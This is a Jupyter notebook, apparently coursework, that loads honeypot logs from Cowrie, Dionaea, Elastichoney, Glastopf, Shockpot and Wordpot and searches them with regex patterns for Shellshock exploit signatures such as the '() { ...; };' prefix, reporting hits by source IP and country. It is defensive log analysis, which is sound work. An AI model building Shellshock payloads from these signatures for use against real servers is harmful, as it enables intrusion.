Option E – Attack Method Detection Part 1

This option deals with creating a method to detect the following attack methods:  
**Chart and Graph by date, the following based on source IP and country.**  
1. Search for strings containing the characters which are known to be used in a Shellshock exploit.  
2. Search for attempts where a website/webserver is being used that potentially hosts malware.  
3. Search for strings containing the characters which are known to be used in a directory transversal attack  
4. Search for cross site scripting (XSS) attacks. 
What types of threat actors are using the above attacks? Where are these attacks coming from? 

### Option E – Attack Method Detection Part 1

This option deals with creating a method to detect the following attack methods:  
** Chart and Graph by date, the following based on source IP and country. **

#### 1. Search for strings containing the characters which are known to be used in a Shellshock exploit.

In [1]:
% matplotlib inline

from IPython.core.display import display, HTML
display(HTML("<style>.container { width:90% !important; }</style>"))
import numpy as np
import pandas as pd
pd.set_option('display.max_columns', 100)
pd.set_option('display.height', 100)

In [2]:
tracker=[]


# define check function
def chk3(chkdf,  searchlist, dfname, arr=tracker):
    pd.set_option('display.max_rows', 500)
    for i in range(8, len(chkdf.columns), 1):
        result = chkdf[chkdf.iloc[:,i].str.contains(searchlist).fillna(False)]         
        if result.iloc[:,1].count() != 0:
            print("Found <",searchlist,"> in column <", chkdf.columns[i],"> count",result.iloc[:,1].count())
            arr.append([dfname,searchlist,chkdf.columns[i],result.iloc[:,1].count()])
            return (result[['timestamp','source_ip','country','asn',chkdf.columns[i]]])
            

In [3]:
# list of keywords i'm finding
# https://twitter.com/cyb3rops/status/515801861086248960?lang=en

mylist = {'\:\;' ,
          '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$/',
          '\(\)\s*\t*\{.*;\s*\}\s*;'
         }

***
### Cowrie

In [4]:
cowrie_tracker=[]


dfc = pd.read_csv("sorted-cowrie.csv",sep='\t',dtype='str')

dfc=dfc[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn', 'commands', 'loggedin',
       'version', 'ttylog', 'urls', 'session', 'payload_startTime',
       'payload_endTime', 'credentials']]

dfc_1 = pd.DataFrame()
for ix in mylist:
    dfc_1 = pd.concat([dfc_1,chk3(dfc,ix,'Cowrie',cowrie_tracker)]).reset_index(drop=True)
if (dfc_1.empty != True):
    dfc_1 = dfc_1.drop_duplicates()
else:
    print("Dataframe Empty")

  


Found < \:\; > in column < credentials > count 1


***
### Dionaea (empty omit)

In [5]:
dfd = pd.read_csv("sorted-dionaea.csv",sep='\t',dtype='str')
dfd=dfd[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn', 'remote_hostname',
       'connection_transport', 'connection_type']]

dfd_1 = pd.DataFrame()
for ix in mylist:
    dfd_1 = pd.concat([dfd_1,chk3(dfd,ix,'Dionaea')]).reset_index(drop=True)
if (dfd_1.empty != True):
    dfd_1 = dfd_1.drop_duplicates()
else:
    print("Dataframe Empty")

  


Dataframe Empty


***
### Elastic

In [6]:
dfe = pd.read_csv("sorted-elastichoney.csv",sep='\t',dtype='str')
dfe=dfe[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn','method','type',
        'URL','form','user_agent','Payload Connection','Payload','Payload Resource','Payload MD5']]

dfe_1 = pd.DataFrame()
for ix in mylist:
    dfe_1 = pd.concat([dfe_1,chk3(dfe,ix,'Elastic')]).reset_index(drop=True)
if (dfe_1.empty != True):
    dfe_1 = dfe_1.drop_duplicates()
else:
    print("Dataframe Empty")

Dataframe Empty


  


***
### Glastopf

In [7]:
dfg = pd.read_csv("sorted-glastopf.csv",sep='\t',dtype='str')
dfg=dfg[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn','Version','pattern',
        'filename','request_raw','request_url']]
dfg_1 = pd.DataFrame()
for ix in mylist:
    dfg_1 = pd.concat([dfg_1,chk3(dfg,ix,'Glastopf')]).reset_index(drop=True)
if (dfg_1.empty != True):
    dfg_1 = dfg_1.drop_duplicates()
else:
    print("Dataframe Empty")

Dataframe Empty


  


***
### Shockpot

In [8]:
dfs = pd.read_csv("sorted-shockpot.csv",sep='\t', lineterminator='\r',dtype='str')
dfs = dfs.loc[:,['timestamp','source_ip',
       'city', 'province', 'province_code', 'country', 'country_code','asn', 'method', 'path', 'URL',
       'query_string', 'Authorization', 'Content-Type', 'Cookie', 'Host', 'Connection',
       'Te', 'Accept-Encoding', 'User Agent', 'X_Forwarded_For',
       'X_Requested_With', 'is-shellshock']].fillna("")
dfs = dfs.drop(dfs.index[5284])

dfs_1 = pd.DataFrame()
for ix in mylist:
    dfs_1 = pd.concat([dfs_1,chk3(dfs,ix,'shockpot')]).reset_index(drop=True)
if (dfs_1.empty != True):
    dfs_1 = dfs_1.drop_duplicates()
else:
    print("Dataframe Empty")

  


Dataframe Empty


***
### Word (empty omit)

In [9]:
dfw = pd.read_csv("sorted-wordpot.csv",sep='\t',dtype='str')

dfw=dfw[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn', 'URL', 'filename',
       'user_agent', 'User Name', 'Password']]

dfw_1 = pd.DataFrame()
for ix in mylist:
    dfw_1 = pd.concat([dfw_1,chk3(dfw,ix,'Word')]).reset_index(drop=True)
if (dfw_1.empty != True):
    dfw_1 = dfw_1.drop_duplicates()
else:
    print("Dataframe Empty")

  


Dataframe Empty
